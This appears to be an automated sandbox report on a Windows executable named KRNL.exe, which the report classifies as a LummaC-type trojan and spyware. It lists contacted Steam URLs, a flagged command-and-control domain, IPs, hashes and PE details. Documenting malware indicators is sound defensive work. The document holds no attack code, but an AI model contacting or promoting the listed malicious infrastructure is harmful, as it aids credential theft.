                                                                                                                                                                https://www.google.com/recaptcha/KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://checkout.steampowered.com/KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://login.steampKKRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesKRNL.exe, 00000002.00000003.1712222118.0000000005A73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://help.stKRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://crl.entrust.net/2048ca.crl0KRNL.exefalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://store.steampowered.com/;KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://www.entrust.net/rpa0KRNL.exefalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://store.steampowered.com/about/KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://steamcommunity.com/my/wishlist/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://ocsp.entrust.net03KRNL.exefalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://ocsp.entrust.net02KRNL.exefalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://checkout.steampowKRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://help.steampowered.com/en/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://steamcommunity.com/market/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://store.steampowered.com/news/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://lev-tolstoi.com/apiulKRNL.exe, 00000002.00000003.1751845531.00000000033EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://lev-tolstoi.com/apimKRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://store.steampowered.com/subscriber_agreement/KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17KRNL.exe, 00000002.00000003.1723581632.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712083330.0000000005A9F000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712222118.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1723494603.0000000005A98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://recaptcha.net/recaptcha/;KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://steamcommunity.com/discussions/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://store.steampowered.com/stats/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://medal.tvKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://broadcast.st.dl.eccdnx.comKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngKRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://store.steampowered.com/steam_refunds/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://x1.c.lencr.org/0KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://x1.i.lencr.org/0KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallKRNL.exe, 00000002.00000003.1712222118.0000000005A73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchKRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high

                                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                    172.67.157.254
                                                                                                                                                                                                                                    		lev-tolstoi.comUnited States
                                                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    104.102.49.254
                                                                                                                                                                                                                                    		steamcommunity.comUnited States
                                                                                                                                                                                                                                    		16625AKAMAI-ASUSfalse

                                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                    Analysis ID:1583085
                                                                                                                                                                                                                                    Start date and time:2025-01-01 21:27:05 +01:00
                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                    Overall analysis duration:0h 4m 54s
                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                    Number of analysed new started processes analysed:7
                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                    Sample name:KRNL.exe
                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@4/1@12/2
                                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                    • Successful, ratio: 94%
                                                                                                                                                                                                                                    • Number of executed functions: 61
                                                                                                                                                                                                                                    • Number of non-executed functions: 169
                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.85.23.206, 4.175.87.197, 13.107.246.45
                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                    15:27:56API Interceptor11x Sleep call for process: KRNL.exe modified

                                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    172.67.157.254Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                        Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                                                                                                                                            Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                                        • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                                                        http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • www.valvesoftware.com/legal.htm

                                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        lev-tolstoi.comGz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        Crosshair-X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        steamcommunity.comGz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        Crosshair-X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.121.10.34
                                                                                                                                                                                                                                                        iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 23.55.153.106

                                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        CLOUDFLARENETUS01012025.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                        • 104.17.25.14
                                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.198.102
                                                                                                                                                                                                                                                        SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.112.1
                                                                                                                                                                                                                                                        test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.21.21.16
                                                                                                                                                                                                                                                        test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.21.21.16
                                                                                                                                                                                                                                                        web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                                                                        test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.21.21.16
                                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                                                                        qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.219.133
                                                                                                                                                                                                                                                        Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        AKAMAI-ASUSloligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 96.17.237.158
                                                                                                                                                                                                                                                        Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 23.217.49.150
                                                                                                                                                                                                                                                        decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 184.28.90.27
                                                                                                                                                                                                                                                        decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 184.28.90.27
                                                                                                                                                                                                                                                        FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.102.34.241
                                                                                                                                                                                                                                                        decrypt.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 184.28.90.27
                                                                                                                                                                                                                                                        EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254

                                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 104.102.49.254

                                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                        \Device\ConDrv

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\KRNL.exe
                                                                                                                                                                                                                                                        File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):14402
                                                                                                                                                                                                                                                        Entropy (8bit):4.874636730022465
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
                                                                                                                                                                                                                                                        MD5:DF0EFD0545733561C6E165770FB3661C
                                                                                                                                                                                                                                                        SHA1:0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
                                                                                                                                                                                                                                                        SHA-256:A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
                                                                                                                                                                                                                                                        SHA-512:3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                        Preview:AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B

                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Entropy (8bit):7.565451721581941
                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                        File name:KRNL.exe
                                                                                                                                                                                                                                                        File size:567'848 bytes
                                                                                                                                                                                                                                                        MD5:976a25d2fed5fc7c8700588a33c6826c
                                                                                                                                                                                                                                                        SHA1:cce0da8a52a534d6252e716f8476193587e84745
                                                                                                                                                                                                                                                        SHA256:a9345000b80b1dd7e5ab5f1491771d39230c83311a1f1b98502f07df453ef02c
                                                                                                                                                                                                                                                        SHA512:d00f6e9841175880be5083b950a62b97b5496f461cb96b51a9332166e90969871127cc056265f23d5f7692a886227045173ce6439a42eca9c1b31af4fc399564
                                                                                                                                                                                                                                                        SSDEEP:12288:oYO6Dqzihouxpa+yWTKbuQ4bUJRNds4b/gCJPEO:tO6DThou2+yDbZkUJ3dsPIPt
                                                                                                                                                                                                                                                        TLSH:CDC4E1523691C0B2C5531A764A75D7795A3EFC200F22AAC793984BFDDEB02D14F31A2E
                                                                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@.................................G.....@.................................|j..<..

                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Entrypoint:0x4104a0
                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
